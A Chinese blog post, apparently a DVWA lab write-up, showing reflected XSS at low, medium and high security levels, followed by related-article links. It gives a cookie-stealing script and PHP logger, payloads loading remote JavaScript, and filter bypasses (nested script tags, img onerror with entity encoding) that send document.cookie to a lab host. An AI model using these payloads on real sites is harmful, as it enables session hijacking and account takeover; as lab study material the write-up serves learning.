int型 判断奇偶_XSS(Reflected) 反射型跨站攻击

最新推荐文章于 2023-05-03 23:13:49 发布
最新推荐文章于 2023-05-03 23:13:49 发布
阅读量172 收藏
点赞数
文章标签: int型 判断奇偶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34652034/article/details/113081141
版权

9da7c8d84dc11f548937ad98130e0452.png

今天我学习一下反射型XSS。

1、low级别

打开DVWA网站,先切换到low级别,选择XSS(Reflected)

582f2f08e036116b28c0f5ab5f75bbbb.png

先查看其源代码:

<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

从上面代码以及执行结果来看,直接把用户输入,也就是name变量值直接显示在界面。试探是否存在XSS,最直接的方法是输入payload代码 <script>alert("xss")</script>,执行查看结果,如果能够弹出alert对话框,则证明存在xss。

a47c2c382f5876686e15fd6533f42f34.png

DVWA网站上,在上面提交<script>alert("xss")</script>,,出现上面提示框,则证明该网站存在xss攻击漏洞。

利用这个XSS,我们可以获取用户的cookie或session,获得后,可以构造“合法用户”去访问网站。首先编写js文件,在窗口输入中,输入后执行这个JS文件。JS代码如下:

document.write("<form action='http://192.168.92.129/DVWA/steal.php' name='exploit' method='post' style='display:none'>");

document.write("<input type='hidden' name='data' value='"+document.cookie+"'>");

document.write("</form>");

document.exploit.submit();

上面代码主要是构造一个页面,这个页面做一个隐藏的form表单和隐藏域,内容是把当前网站的cookie提交表单后,提交到steal.php文件处理。在攻击时,这个js文件和这个php文件以及数据库是放在攻击者自己的服务器上。这里我把他们都放在了同一个网站里,原理是相同的。

由steal.php文件完成把cookie写入文件,steal.php文件内容如下。

<?php

header("content-type:text/html;charset=utf-8");

$conn=mysqli_connect("localhost","root","123456");

mysqli_select_db($conn,"dvwacookie");

if(isset($_GET['data']))

{

$sql="insert into low(cookie) values('".$_GET['data']."');";

$result=mysqli_query($conn,$sql);

echo "1</br>";

mysqli_close();

}

else if(isset($_POST['data']))

{

$sql="insert into low(cookie) values('".$_POST['data']."');";

if (mysqli_query($conn,$sql)) {

echo "scuess!";

} else {

echo "Error: " . $sql . "<br>" . mysqli_error($conn);

}

echo "2</br>".$_POST['data']."</br>";

mysqli_close();

}

else {

$sql="select * from low";

$result=mysqli_query($conn,$sql);

while($row=mysqli_fetch_array($result))

{

echo "cookie is:".$row[1]."</br>";

}

mysqli_close();

}

?>

上面代码主要根据是get还是post,取数据函数不同。在连接数据库后,把cookie写入到表low中。建库和表的SQL语句如下。

这个库表的建立sql语句

SET FOREIGN_KEY_CHECKS=0;

DROP TABLE IF EXISTS `high`;

CREATE TABLE `high` (

`id` int(11) NOT NULL AUTO_INCREMENT,

`cookie` varchar(100) COLLATE utf8_unicode_ci NOT NULL,

PRIMARY KEY (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

DROP TABLE IF EXISTS `low`;

CREATE TABLE `low` (

`id` int(11) NOT NULL AUTO_INCREMENT,

`cookie` varchar(100) COLLATE utf8_unicode_ci NOT NULL,

PRIMARY KEY (`id`)

) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

DROP TABLE IF EXISTS `medium`;

CREATE TABLE `medium` (

`id` int(11) NOT NULL AUTO_INCREMENT,

`cookie` varchar(100) COLLATE utf8_unicode_ci NOT NULL,

PRIMARY KEY (`id`)

) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

在输入窗口下,输入下面payload进行攻击,上面代码中为了调试,添加打印语句,实际攻击中,不会有内容输出到页面上。

<script src=http://192.168.92.129/DVWA/cookie.js></script>

相当于在浏览器地址栏执行下面语句:

http://192.168.92.129/DVWA/vulnerabilities/xss_r/?name=<script src=http://192.168.92.129/DVWA/cookie.js></script>

我们在这里演示为了方便,放在了同一个域下面。实际上src可以加载远程服务器的js。

执行完成后,看到已经插入到low表中。

05553df4f2eeff39dcda883c5c8007cf.png

如果没有插入记录成功,则可能是mysql设置问题,执行下面语句。

1 show variables like "sql_mode";

2 set sql_mode='';

3 set sql_mode='NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES';

XSS攻击方式经常是攻击者可以将带有执行脚本的链接地址伪装后发给正在访问某个网站(例如某银行网银)的受害者,受害者点击时就会加载远程服务器(这里是win7)的cookie.js脚本,这里要提一点,用src加载远程服务器的js脚本,那么js的源就会变成加载它的域,从而可以读取该域的数据。

2、Medium级别

下面是我们学习Medium级别,切换到中级,查看网站代码:

0443f7ae96ccc56d17c17c517d207190.png

可以看到使用str_replace函数把<script>替换为空格了。所以我们在构造js文件时,可以利用str_replace函数只能替换一次,且不区分大小写的特点,在提交表单时,把js语句调整为<scri<script>pt src=http://192.168.92.129/DVWA/cookie.js></script>

上面str_replace函数是对name变量字符串进行正则替换,如果找到<script>替换为空,替换后执行的还是<script src=http://192.168.92.129/DVWA/cookie.js></script> 语句。

同时修改steal.php中的表,写到medium表中。执行后,检查medium表,可以查看到把cookie写到medium表中。

a87387a9d87e07e0da5c7af288b3ac46.png

3、High级别

下面学习安全级别设置为Hight的情况。设置后查看源代码

e913905a0f88ae9a936eea4e49629d87.png

发现添加了对大小写绕过的判断,而且根据正则表达式过滤,提交内容只要有script顺序出现的字母都一律过滤掉,只是过滤了script标签,但是有一些javascript事件后仍然能执行javascript代码,构造payload。

上面preg_replace字符串替换函数中,使用的正则表达式。

preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name'表示在在字符串中找script6个字符,i是不区分大小写,这些字符中间可以或前后可以有其它多个字符。

<img src=# οnerrοr=alert("xss")> 能够执行,证明还是存在XSS攻击。通过加载一个不存在的图片出错触发javascript on error事件,继续弹框,证明出来有xss,这样的payload还有很多。

那么输入下面语句试试,发现没有得到cookie

<img

src=# οnerrοr=(location.href="http://192.168.92.129/DVWA/steal.php?data="+document.cookie)>

分析上面语句,发现了问题,在上面语句中,发现了可以构成script,看下面我标记后的语句

<img

src=# οnerrοr=(location.href="http://192.168.92.129/DVWA/steal.php?data="+document.cookie)>

7406f72203c68feaba74d40511d0228b.png

说明把最后一个t之前的全部过滤了。

把其中一个字符使用ASCII编码,防止出现script字符串。

可以使用转码网站http://www.ofmonkey.com/encode/ascii

b729f71105d0b7d9a84492b39c7b2562.png

<img

src=# οnerrοr=(locat&#x69;on.href="http://192.168.92.129/DVWA/steal.php?data="+document.cookie)>

则能正常执行,获得cookie

我们再替换其中一个字符t,ASCII编码 &#116;

<img

src=# οnerrοr=(locat&#x69;on.href="http://192.168.92.129/DVWA/s&#116;eal.php?data="+document.cookie)>

执行完成后,也会得到cookie。字符转码是在攻击中经常使用的技术。

关注安全 关注作者

(完)

小小杀鱼
关注
【漏洞挖掘】——27、XSS漏洞攻防案例
Fly_鹏程万里
03-10 8438
本实验在搜索功能中包含一个简单的点脚本漏洞,为了解决这个实验,您必须执行一个调用alert函数点脚本攻击本实验在搜索博客功能中包含一个反射点脚本漏洞,其中尖括号是HTML编码的,为了解决这个实验,你需要执行一个点脚本攻击,注入一个属性并调用alert函数本实验包含一个反射点脚本漏洞,该漏洞存在于编码了尖括号的搜索查询跟踪功能中,反射发生在JavaScript字符串内部,为了解决这个实验,你需要执行一个点脚本攻击,它突破JavaScript字符串并调用alert函数
协议层的攻击:HTTP请求走私
晓得哥的博客
10-11 7667
作者:mengchen@知道创宇404实验室 日期:2019年10月10日 原文链接:https://paper.seebug.org/1048/ 1. 前言 最近在学习研究BlackHat的议题,其中有一篇议题——"HTTP Desync Attacks: Smashing into the Cell Next Door"引起了我极大地兴趣,在其中,作者讲述了HTTP走私攻击这一攻击手段...
网络安全学习第8篇 - xss攻击(java实现反射xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
一清道长的个人博客
05-14 3963
请依据课堂所讲解的关于XSS攻防的技术知识,结合你所学过的Web前端编程技术,自行设计一套XSS攻防流程。要求: 1、攻防技术的实现既要有深度也要有广度。 2、需要设计一个前端页面。 3、提交时请提交实验报告以及Web前端代码。 实验文件.rar (1)什么是xss脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出...
int 判断奇偶_905. 按奇偶排序数组
weixin_42442651的博客
01-20 252
905. 按奇偶排序数组Loading...​leetcode-cn.com给定一个非负整数数组 A,返回一个由 A 的所有偶数元素组成的数组,后面跟 A 的所有奇数元素。你可以返回满足此条件的任何数组作为答案。示例:输入:[3,1,2,4]输出:[2,4,3,1]输出 [4,2,3,1],[2,4,1,3] 和 [4,2,1,3] 也会被接受。解题思路:这里将判断是否为偶数改为了「&」(...
判断一个int的数是否为奇数
Leo肆
03-30 2292
//int的数可以分为 正偶数,正奇数,负偶数,负奇数。//以下的代码没有考虑到负数的情况,所有负奇数判断结果都是错误的,所以有1/4的结果都是错误的。 public static boolean isOdd(int i){return i%2==1;}//修改方法1:如果int的数对2取余,结果不等于0,那么说明改数为奇数。public static boolean isOdd(int i){return i%2!=0;}//修改方法2:提高程序性能public static boolean is
判断奇偶
qq_51960054的博客
01-05 828
PTA基础编程题目集 6-12 判断奇偶性 本题要求实现判断给定整数奇偶性的函数函数接口的定义 int even( int n ); 其中n是用户传入的整参数。当n为偶数时,函数返回1;n为奇数时返回0。注意:0是偶数。 裁判测试程序样例: #include <stdio.h> int even( int n ); int main() { int n; scanf("%d", &n); if (even(n)) printf
判断整数的奇偶
梧卫清
02-14 655
编写一个应用程序,它读取一个整数,并判定它是奇数还是偶数,然后打印该数。提示:可以使用求模运算符。偶数是2的倍数,所有是2的倍数的数,被2除时余数为0。import javax.swing.JOptionPane;public class OddEven { public static void main(String[] args) { String numVal; String res...
2019-3-2 dvwa学习(5)--DOMXSS攻击
weixin_42555985的博客
03-02 1534
什么是XSS攻击XSS,Cross-site Scripting ,脚本攻击,是一种注入攻击, 它会把恶意脚本(malicious scripts) 注入其他网中。当攻击者使用Web应用程序向不同的最终用户发送恶意脚本(通常以浏览器脚本的形式)时,就会发生XSS攻击。 能让这些攻击成功的缺陷非常普遍,例如:Web应用程序在其生成的输出中使用了用户输入,同时又不做验证(validatin...
[红日安全]Web安全Day2 - XSS实战攻防
hongrisec的博客
02-20 939
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
网络安全-常见漏洞与分析
happydream_C的博客
11-21 7593
一、SQL注入 (1)注入产生原理 使用用户输入的参数拼凑SQL语句,用户对服务器端代码里的SQL语句可控,使服务器执行恶意的sql命令 http://bbs.pconline.com.cn/topic.jsp?tid=1 ' and 1=2 (2)万能密码 select * from tb_name where name = ' ' or 1=1 - - '  and  passwd
判断奇偶方法
qq_42331014的博客
11-16 604
判断奇偶
不同阶段判断一个int是否为奇数
yuleishangran的博客
05-11 568
package com.huangliwei.jdk.other; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.junit.Test; public class Demo1 { private static final Logger LOG =...
DVWA平台v1.8-反射XSS(low级别)
andiao1218的博客
12-14 171
源代码 <?php if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){ $isempty = true; } else { echo '<pre>'; echo '你好' . $_GE...
反射XSS攻击具体是如何实现的?如何预防呢?
最新发布
2301_76418831的博客
05-03 345
对于重要的用户数据,如身份验证凭据和支付信息,应采取更加安全的措施,例如使用HTTPS,加密数据等。使用安全框架和安全编码实践,例如OWASP Top 10,以确保应用程序能够抵御XSS攻击。我们可以对所有输入数据进行验证,过滤或转义,特别是在将其输出到页面中时。对于敏感操作,例如更改密码或删除帐户,应要求用户进行额外的身份验证。应用程序接收到请求后,会将其中的数据作为输入并在页面中反射输出。受害者浏览器接收到反射输出的页面后,会将其中的恶意脚本执行。
反射xss实战演示
热门推荐
huli870715的专栏
02-26 1万+
我们知道,XSS攻击大致分为三种类 :Persistent(持久),Non-persistent(反射)及Dom-based。而反射是最常用,也是使用得最广的一种攻击方式。它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。     今天,通过一个反射xss的实战演示
一次简单的反射XSS操作及思路
qq_42097777的博客
04-04 3049
xss是类似对html代码的注入,拼接恶意代码获取cookie等 分为三种类,分别是反射、存储和dom 反射是不存入数据库,对自己有影响 存储是存入数据库,对来访者都有影响 1.进入靶场看到输入框,进行插入js标签 输入框里输入:< script>alert(1)</ script > 点击搜索 语句没有执行,而是被当做文本搜索了,这显然不是我们想看到的,点...
XSS的原理分析、反射XSS
weixin_41487522的博客
05-06 2331
XSS的原理分析 XSS的原理和特性 XSS可以理解为html代码的注入。 这里简单回顾一下注入: 注入的两个关键条件: 1.用户输入能够控制输入 2.原本程序要执行的代码,拼接了用户输入的数据 这里XSS拼接的就是网页的html代码,一般而言我们是可以拼接出合适的html代码去执行恶意的JS语句。 因为达到各种各样的效果需要比较复杂的代码,所以XSS平台应运而生: xsspt.com(开放注册)...
XSS脚本攻击
qq_42253044的博客
01-03 389
XSS脚本攻击 XSS,全称Cross Site Scripting,即脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS反射XSS。 DOMXSS由于其特殊性,...
浅谈反射XSS的利用
weixin_34258838的博客
01-23 721
|=---------------------------------------------------------------------------=| |=-------------------------=[ 浅谈反射XSS的利用 ]=-------------------------=| |=-------------------------------...
XSS脚本攻击详解与防御策略
"该资源主要介绍了XSS脚本攻击的相关知识,包括攻击的定义、类、漏洞挖掘以及防范措施。此外,还探讨了Web安全的三个主要目标:保护Web服务器及其数据的安全、保护信息传递的安全以及保护终端用户设备的安全。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值